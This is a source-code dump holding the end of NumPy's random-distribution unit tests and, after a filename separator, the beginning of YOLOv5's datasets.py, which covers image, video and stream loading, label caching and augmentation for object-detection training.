[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
np.testing.assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
# Hmm... not even symmetric.
cov = [[1, 0], [1, 0]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[-1.47027513018564449, 10.],
[-1.65915081534845532, 10.]],
[[-2.29186329304599745, 10.],
[-1.77505606019580053, 10.]],
[[-0.54970369430044119, 10.],
[0.29768848031692957, 10.]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([-0.79441224511977482, 10.])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance raises warning
mean = [0, 0]
cov = [[1, 1 + 1e-10], [1 + 1e-10, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
np.testing.assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[ 1.47145377828516666, 0.15052899268012659],
[ 0.00943803056963588, 1.02647251615666169],
[ 0.332334982684171 , 0.15451287602753125]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.scipy.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
np.testing.assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
np.testing.assert_raises(OverflowError, func, -np.inf, 0)
np.testing.assert_raises(OverflowError, func, 0, np.inf)
np.testing.assert_raises(OverflowError, func, fmin, fmax)
# (fmax / 1e17) - fmin is within range, so this should not throw
np.random.uniform(low=fmin, high=fmax / 1e17)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
np.testing.assert_array_equal(actual, desired)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if (np.intp().dtype.itemsize == 4 and sys.platform == "win32"):
np.testing.assert_array_almost_equal(out1, out2)
else:
np.testing.assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000,6))
if __name__ == "__main__":
run_module_suite()
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import (LOGGER, check_dataset, check_requirements, check_yaml, clean_str, segments2boxes, xyn2xy,
xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1))  # DDP world size
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
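# --- Illustrative note (not part of the original file): after this loop, `orientation`
# holds the numeric EXIF tag id for 'Orientation' (274, i.e. 0x0112), which exif_size()
# below uses to look up how an image is rotated.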
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
    except Exception:  # image has no EXIF data or no orientation tag
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
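# --- Illustrative sketch (not part of the original file): typical use of exif_transpose()
# defined above. The file name is a hypothetical placeholder.
def _exif_transpose_example(path='phone_photo.jpg'):
    img = Image.open(path)     # PIL image that may carry an EXIF Orientation tag
    img = exif_transpose(img)  # pixels rotated/flipped so the tag can be ignored downstream
    return img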
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // WORLD_SIZE, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
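# --- Illustrative sketch (not part of the original file): InfiniteDataLoader behaves like a
# regular DataLoader, but its batch sampler repeats forever, so worker processes (when
# num_workers > 0) are reused across epochs. The TensorDataset below is only a stand-in for
# LoadImagesAndLabels; num_workers=0 keeps the sketch self-contained.
def _infinite_loader_example():
    from torch.utils.data import TensorDataset
    data = TensorDataset(torch.arange(8).float())
    loader = InfiniteDataLoader(data, batch_size=4, num_workers=0, shuffle=False)
    for epoch in range(2):  # a second pass over the loader reuses the same iterator/workers
        for (batch,) in loader:
            print(epoch, batch.tolist())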
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
        self.pipe = int(pipe) if pipe.isnumeric() else pipe  # local camera index or stream address
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
            s = int(s) if s.isnumeric() else s  # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
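# --- Illustrative note (not part of the original file): the images->labels mapping performed
# above, shown on a hypothetical COCO-style path (POSIX path separators assumed):
#   img2label_paths(['../datasets/coco128/images/train2017/000000000009.jpg'])
#   -> ['../datasets/coco128/labels/train2017/000000000009.txt']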
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.img_files) # same hash
        except Exception:  # cache missing, stale, or unreadable
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index (np.int is deprecated)
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
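            # --- Illustrative note (not part of the original file): with img_size=640, stride=32,
            # pad=0 and a batch whose largest aspect ratio h/w is 0.75 (all images wider than tall),
            # shapes[i] = [0.75, 1], so batch_shapes[i] = ceil([0.75, 1] * 640 / 32) * 32 = [480, 640].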
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
